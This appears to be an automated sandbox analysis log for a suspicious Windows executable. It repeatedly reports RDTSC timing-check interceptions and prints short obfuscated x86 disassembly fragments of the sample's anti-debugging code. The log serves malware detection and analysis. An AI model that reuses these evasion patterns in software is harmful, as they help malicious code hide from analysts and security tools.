                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D69185 second address: D691A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C80FB5675h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D68800 second address: D6881B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 jmp 00007F9C81394C04h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D6881B second address: D68823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D68992 second address: D689B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jg 00007F9C81394BFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D68C81 second address: D68C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D68C85 second address: D68C8B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D68DCD second address: D68DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C80FB5674h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D68DE9 second address: D68E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F9C81394C07h 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D68E09 second address: D68E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9C80FB5676h 0x00000009 jnl 00007F9C80FB5666h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D68E29 second address: D68E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D68E2D second address: D68E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D68E37 second address: D68E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D68E3D second address: D68E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D68E41 second address: D68E63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9C81394C06h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D68E63 second address: D68E69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D68E69 second address: D68E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9C81394C02h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D68E83 second address: D68E87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D68E87 second address: D68E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D68E8D second address: D68E92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D68E92 second address: D68E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D6BC39 second address: D6BC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D6BC45 second address: D6BC5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D6BDCF second address: D6BDD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D6BE5C second address: D6BE90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9C81394C06h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D6C158 second address: D6C167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007F9C80FB566Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D6C167 second address: D6C1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F9C81394BF8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov edx, esi 0x00000024 mov dword ptr [ebp+122D29FCh], eax 0x0000002a push dword ptr [ebp+122D34D8h] 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007F9C81394BF8h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a jo 00007F9C81394BFBh 0x00000050 mov edx, 16B2EC84h 0x00000055 mov dl, 1Fh 0x00000057 call 00007F9C81394BF9h 0x0000005c push esi 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D6C1D2 second address: D6C1D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D6C1D6 second address: D6C20B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b jmp 00007F9C81394C08h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 push eax 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop eax 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | RDTSC instruction interceptor: First address: D6C20B second address: D6C22F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ecx 0x00000009 jbe 00007F9C80FB566Ch 0x0000000f je 00007F9C80FB5666h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jno 00007F9C80FB5666h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D6EDBF second address: D6EDC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D70DE1 second address: D70DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D70DE5 second address: D70DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D70DE9 second address: D70DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D70DEF second address: D70DF9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9C81394BFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D70DF9 second address: D70E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 jmp 00007F9C80FB5674h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 jmp 00007F9C80FB5675h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50D0394 second address: 50D03AF instructions: 0x00000000 rdtsc 0x00000002 call 00007F9C81394C02h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50D03AF second address: 50D03F9 instructions: 0x00000000 rdtsc 0x00000002 mov si, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edx, 33B401E6h 0x00000011 pushfd 0x00000012 jmp 00007F9C80FB5677h 0x00000017 adc ecx, 303B3C6Eh 0x0000001d jmp 00007F9C80FB5679h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50D03F9 second address: 50D0416 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9C81394C07h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50D0416 second address: 50D0424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50D0424 second address: 50D0428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50D0428 second address: 50D0436 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB566Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50D0436 second address: 50D043C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50D043C second address: 50D0440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 51006A5 second address: 51006AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 51006AB second address: 51006FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007F9C80FB5671h 0x0000000c and ax, 4B76h 0x00000011 jmp 00007F9C80FB5671h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F9C80FB5678h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 51006FA second address: 5100709 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100709 second address: 510070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 510070F second address: 5100747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F9C81394C06h 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F9C81394BFAh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100747 second address: 510074B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 510074B second address: 5100751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100751 second address: 5100787 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB566Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F9C80FB566Bh 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9C80FB5675h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100787 second address: 510078D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 510078D second address: 5100791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100791 second address: 510079F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov dl, al 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 510079F second address: 51007E8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F9C80FB566Dh 0x00000008 sub al, FFFFFFB6h 0x0000000b jmp 00007F9C80FB5671h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov dx, si 0x00000016 popad 0x00000017 mov dword ptr [esp], esi 0x0000001a jmp 00007F9C80FB566Ah 0x0000001f lea eax, dword ptr [ebp-04h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F9C80FB566Ah 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 51007E8 second address: 51007F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 51007F7 second address: 51007FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 51007FD second address: 5100886 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9C81394C04h 0x00000013 add cx, CB98h 0x00000018 jmp 00007F9C81394BFBh 0x0000001d popfd 0x0000001e pushad 0x0000001f mov esi, 0C0121E5h 0x00000024 call 00007F9C81394C02h 0x00000029 pop ecx 0x0000002a popad 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov edi, esi 0x00000030 popad 0x00000031 nop 0x00000032 pushad 0x00000033 movsx edi, ax 0x00000036 pushfd 0x00000037 jmp 00007F9C81394BFEh 0x0000003c add esi, 31B3D058h 0x00000042 jmp 00007F9C81394BFBh 0x00000047 popfd 0x00000048 popad 0x00000049 push dword ptr [ebp+08h] 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100886 second address: 510088A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 510088A second address: 5100890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100890 second address: 5100896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100896 second address: 510089A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 51008C1 second address: 51008F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9C80FB566Dh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 51008F1 second address: 5100921 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b jmp 00007F9C81394BFEh 0x00000010 je 00007F9C81394C93h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100921 second address: 510095A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F9C80FB5673h 0x0000000a or esi, 5B90DC9Eh 0x00000010 jmp 00007F9C80FB5679h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 51009FD second address: 5100A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100A01 second address: 5100A1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5677h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100A1C second address: 5100A5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9C81394BFFh 0x00000009 xor ax, 8CDEh 0x0000000e jmp 00007F9C81394C09h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 leave 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100A5A second address: 5100A60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100A60 second address: 50F0008 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 jmp 00007F9C81394BF2h 0x00000015 xor ebx, ebx 0x00000017 test al, 01h 0x00000019 jne 00007F9C81394BF7h 0x0000001b sub esp, 04h 0x0000001e mov dword ptr [esp], 0000000Dh 0x00000025 call 00007F9C859D21EBh 0x0000002a mov edi, edi 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0008 second address: 50F000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F000C second address: 50F0010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0010 second address: 50F0016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0016 second address: 50F001E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F001E second address: 50F00C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F9C80FB5678h 0x0000000d push eax 0x0000000e jmp 00007F9C80FB566Bh 0x00000013 xchg eax, ebp 0x00000014 jmp 00007F9C80FB5676h 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F9C80FB566Eh 0x00000022 sbb ecx, 24C674C8h 0x00000028 jmp 00007F9C80FB566Bh 0x0000002d popfd 0x0000002e mov ax, 6A3Fh 0x00000032 popad 0x00000033 sub esp, 2Ch 0x00000036 jmp 00007F9C80FB5672h 0x0000003b xchg eax, ebx 0x0000003c jmp 00007F9C80FB5670h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F9C80FB566Dh 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F00C2 second address: 50F00C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F00C8 second address: 50F00CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F00CD second address: 50F0117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 jmp 00007F9C81394C05h 0x0000000d xchg eax, edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushfd 0x00000014 jmp 00007F9C81394C09h 0x00000019 jmp 00007F9C81394BFBh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0117 second address: 50F015B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F9C80FB566Dh 0x00000013 sbb cl, 00000016h 0x00000016 jmp 00007F9C80FB5671h 0x0000001b popfd 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F015B second address: 50F0166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0166 second address: 50F017C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F9C80FB5670h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F017C second address: 50F0182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
